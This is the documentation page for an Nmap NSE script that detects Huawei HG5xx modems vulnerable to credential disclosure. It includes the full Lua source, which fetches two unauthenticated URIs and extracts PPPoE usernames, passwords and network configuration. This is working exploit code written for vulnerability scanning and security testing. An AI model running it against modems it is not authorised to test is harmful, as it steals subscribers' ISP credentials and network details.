<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File http-huawei-hg5xx-vuln</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth<br/>
<b>Author:</b> Paulino Calderon <calderon@websec.mx><br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/http-huawei-hg5xx-vuln.nse">https://svn.nmap.org/nmap/scripts/http-huawei-hg5xx-vuln.nse</a><br/>
<h3>Summary</h3>
<p>Detects Huawei modems models HG530x, HG520x, HG510x (and possibly others...) vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials and other interesting configuration values.</p>
<p>Attackers can query the URIs "/Listadeparametros.html" and "/wanfun.js" to extract sensitive information including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values.</p>
<p>This script exploits two vulnerabilities. One was discovered and reported by Adiaz from Comunidad Underground de Mexico (http://underground.org.mx) and it allows attackers to extract the pppoe password. The configuration disclosure vulnerability was discovered by Pedro Joaquin (http://hakim.ws).</p>
<p>References:</p>
<ul>
<li><a href="http://websec.ca/advisories/view/Huawei-HG520c-3.10.18.x-information-disclosure" target=_blank>http://websec.ca/advisories/view/Huawei-HG520c-3.10.18.x-information-disclosure</a></li>
<li><a href="http://routerpwn.com/#huawei" target=_blank>http://routerpwn.com/#huawei</a></li>
</ul>
<h3>Arguments</h3>
<table>
<tr><td>slaxml.debug:</td><td>See the documentation for the <a href="nmap/libraries/slaxml.htm">slaxml</a> library</td></tr>
<tr><td>http.host:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-body-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-cache-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.truncated-ok:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.useragent:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>smbdomain:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbhash:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbnoguest:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbpassword:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbtype:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbusername:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>vulns.short:</td><td>See the documentation for the <a href="nmap/libraries/vulns.htm">vulns</a> library</td></tr>
<tr><td>vulns.showall:</td><td>See the documentation for the <a href="nmap/libraries/vulns.htm">vulns</a> library</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap -p80 --script http-huawei-hg5xx-vuln &lt;target&gt;
nmap -sV http-huawei-hg5xx-vuln &lt;target&gt;</pre>
<h3>Output</h3>
<pre>PORT   STATE SERVICE VERSION
80/tcp open  http    Huawei aDSL modem EchoLife HG530 (V100R001B122gTelmex) 4.07 -- UPnP/1.0 (ZyXEL ZyWALL 2)
| http-huawei-hg5xx-vuln:
|   VULNERABLE:
|   Remote credential and information disclosure in modems Huawei HG5XX
|     State: VULNERABLE (Exploitable)
|     Description:
|       Modems Huawei 530x, 520x and possibly others are vulnerable to remote credential and information disclosure.
|       Attackers can query the URIs &quot;/Listadeparametros.html&quot; and &quot;/wanfun.js&quot; to extract sensitive information
|       including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values
|     Disclosure date: 2011-01-1
|     Extra information:
|
|   Model:EchoLife HG530
|   Firmware version:V100R001B122gTelmex
|   External IP:xxx.xxx.xx.xxx
|   Gateway IP:xxx.xx.xxx.xxx
|   DNS 1:200.33.146.249
|   DNS 2:200.33.146.241
|   Network segment:192.168.1.0
|   Active ethernet connections:0
|   Active wireless connections:3
|   BSSID:0xdeadbeefcafe
|   Wireless Encryption (Boolean):1
|   PPPoE username:xxx
|   PPPoE password:xxx
|     References:
|       http://routerpwn.com/#huawei
|_      http://websec.ca/advisories/view/Huawei-HG520c-3.10.18.x-information-disclosure</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/http.htm">http</a></li>
<li><a href="nmap/libraries/nmap.htm">nmap</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/string.htm">string</a></li>
<li><a href="nmap/libraries/vulns.htm">vulns</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
</ul>
<h3>Code</h3>
<pre>description = [[
Detects Huawei modems models HG530x, HG520x, HG510x (and possibly others...)
vulnerable to a remote credential and information disclosure vulnerability. It
also extracts the PPPoE credentials and other interesting configuration values.

Attackers can query the URIs &quot;/Listadeparametros.html&quot; and &quot;/wanfun.js&quot; to
extract sensitive information including PPPoE credentials, firmware version,
model, gateway, dns servers and active connections among other values.

This script exploits two vulnerabilities. One was discovered and reported by
Adiaz from Comunidad Underground de Mexico (http://underground.org.mx) and it
allows attackers to extract the pppoe password. The configuration disclosure
vulnerability was discovered by Pedro Joaquin (http://hakim.ws).

References:
* http://websec.ca/advisories/view/Huawei-HG520c-3.10.18.x-information-disclosure
* http://routerpwn.com/#huawei
]]

---
-- @usage nmap -p80 --script http-huawei-hg5xx-vuln &lt;target&gt;
-- @usage nmap -sV http-huawei-hg5xx-vuln &lt;target&gt;
--
-- @output
-- PORT   STATE SERVICE VERSION
-- 80/tcp open  http    Huawei aDSL modem EchoLife HG530 (V100R001B122gTelmex) 4.07 -- UPnP/1.0 (ZyXEL ZyWALL 2)
-- | http-huawei-hg5xx-vuln:
-- |   VULNERABLE:
-- |   Remote credential and information disclosure in modems Huawei HG5XX
-- |     State: VULNERABLE (Exploitable)
-- |     Description:
-- |       Modems Huawei 530x, 520x and possibly others are vulnerable to remote credential and information disclosure.
-- |       Attackers can query the URIs &quot;/Listadeparametros.html&quot; and &quot;/wanfun.js&quot; to extract sensitive information
-- |       including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values
-- |     Disclosure date: 2011-01-1
-- |     Extra information:
-- |
-- |   Model:EchoLife HG530
-- |   Firmware version:V100R001B122gTelmex
-- |   External IP:xxx.xxx.xx.xxx
-- |   Gateway IP:xxx.xx.xxx.xxx
-- |   DNS 1:200.33.146.249
-- |   DNS 2:200.33.146.241
-- |   Network segment:192.168.1.0
-- |   Active ethernet connections:0
-- |   Active wireless connections:3
-- |   BSSID:0xdeadbeefcafe
-- |   Wireless Encryption (Boolean):1
-- |   PPPoE username:xxx
-- |   PPPoE password:xxx
-- |     References:
-- |       http://routerpwn.com/#huawei
-- |_      http://websec.ca/advisories/view/Huawei-HG520c-3.10.18.x-information-disclosure
---

author = &quot;Paulino Calderon &lt;calderon@websec.mx&gt;&quot;
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;exploit&quot;,&quot;vuln&quot;}

local http = require &quot;http&quot;
local nmap = require &quot;nmap&quot;
local shortport = require &quot;shortport&quot;
local string = require &quot;string&quot;
local vulns = require &quot;vulns&quot;
local stdnse = require &quot;stdnse&quot;

portrule = shortport.http

action = function(host, port)
  local vuln = {
    title = &#39;Remote credential and information disclosure in modems Huawei HG5XX&#39;,
    state = vulns.STATE.NOT_VULN,
    description = [[
Modems Huawei 530x, 520x and possibly others are vulnerable to remote credential and information disclosure.
Attackers can query the URIs &quot;/Listadeparametros.html&quot; and &quot;/wanfun.js&quot; to extract sensitive information
including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values.]],
    references = {
      &#39;http://routerpwn.com/#huawei&#39;,
      &#39;http://websec.ca/advisories/view/Huawei-HG520c-3.10.18.x-information-disclosure&#39;
    },
    dates = {
      disclosure = {year = &#39;2011&#39;, month = &#39;01&#39;, day = &#39;1&#39;},
    },
  }

  -- Identify servers that answer 200 to invalid HTTP requests and exit as these would invalidate the tests
  local status_404, result_404, _ = http.identify_404(host,port)
  if ( status_404 and result_404 == 200 ) then
    stdnse.debug1(&quot;Exiting due to ambiguous response from web server on %s:%s. All URIs return status 200.&quot;, host.ip, port.number)
    return nil
  end

  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
  local open_session = http.get(host, port, &quot;/Listadeparametros.html&quot;)
  if open_session and open_session.status == 200 then
    local _, _, pppoe_user = string.find(open_session.body, &#39;Usuario PPPoE:&lt;/td&gt;&lt;TD class=tablerowvalue&gt;\n(.-)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&#39;)
    local _, _, model = string.find(open_session.body, &#39;Modelo de m\195\179dem:&lt;/td&gt;&lt;TD class=tablerowvalue&gt;\n(.-)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&#39;)
    local _, _, firmware_version = string.find(open_session.body, &#39;Versi\195\179n de Firmware:&lt;/td&gt;&lt;TD class=tablerowvalue&gt;\n(.-)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&#39;)
    local _, _, gateway = string.find(open_session.body, &#39;Puerta de Enlace de Internet:&lt;/td&gt;&lt;TD class=tablerowvalue&gt;\n(.-)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&#39;)
    local _, _, ip = string.find(open_session.body, &#39;IP de Internet del m\195\179dem:&lt;/td&gt;&lt;TD class=tablerowvalue&gt;\n(.-)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&#39;)
    local _, _, dns1 = string.find(open_session.body, &#39;DNS Primario:&lt;/td&gt;&lt;TD class=tablerowvalue&gt;\n(.-)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&#39;)
    local _, _, dns2 = string.find(open_session.body, &#39;DNS Secundario:&lt;/td&gt;&lt;TD class=tablerowvalue&gt;\n(.-)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&#39;)
    local _, _, network_segment = string.find(open_session.body, &#39;Segmento de Red Local:&lt;/td&gt;&lt;TD class=tablerowvalue&gt;\n(.-)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&#39;)
    local _, _, active_ethernet = string.find(open_session.body, &#39;Conexiones Ethernet Activas:&lt;/td&gt;&lt;TD class=tablerowvalue&gt;\n(.-)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&#39;)
    local _, _, active_wireless = string.find(open_session.body, &#39;Conexiones Inal\195\161mbricas Activas:&lt;/td&gt;&lt;TD class=tablerowvalue&gt;\n(.-)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&#39;)
    local _, _, ssid = string.find(open_session.body, &#39;Nombre de Red Inal\195\161mbrica %(SSID%):&lt;/td&gt;&lt;TD class=tablerowvalue&gt;\n(.-)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&#39;)
    local _, _, encryption = string.find(open_session.body, &#39;Encriptaci\195\179n Activada %(0: No, 1:S\195\173%):&lt;/td&gt;&lt;TD class=tablerowvalue&gt;\n(.-)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&#39;)
    local info = string.format(&quot;\nModel:%s\nFirmware version:%s\nExternal IP:%s\nGateway IP:%s\nDNS 1:%s\nDNS 2:%s\n&quot;..
      &quot;Network segment:%s\nActive ethernet connections:%s\nActive wireless connections:%s\nBSSID:%s\nWireless Encryption (Boolean):%s\nPPPoE username:%s\n&quot;,
      model, firmware_version, ip, gateway, dns1, dns2, network_segment, active_ethernet, active_wireless, ssid, encryption, pppoe_user)
    --Checks if the username string was extracted. If its null, the modem is not vulnerable and we should exit.
    if pppoe_user then
      vuln.state = vulns.STATE.EXPLOIT
    else
      stdnse.debug1(&quot;Username string was not found in this page. Exiting.&quot;)
      return vuln_report:make_output(vuln)
    end

    local ppp = http.get(host, port, &quot;/wanfun.js&quot;)
    if ppp.status and ppp.status == 200 then
      local _, _, ppp_pwd = string.find(ppp.body, &#39;var pwdppp = &quot;(.-)&quot;&#39;)
      info = string.format(&quot;%sPPPoE password:%s&quot;, info, ppp_pwd)
    end
    if firmware_version and model then
      port.version.product = string.format(&quot;Huawei aDSL modem %s (%s)&quot;, model, firmware_version)
      nmap.set_port_version(host, port)
    end
    vuln.extra_info = info
    return vuln_report:make_output(vuln)
  end
end</pre>
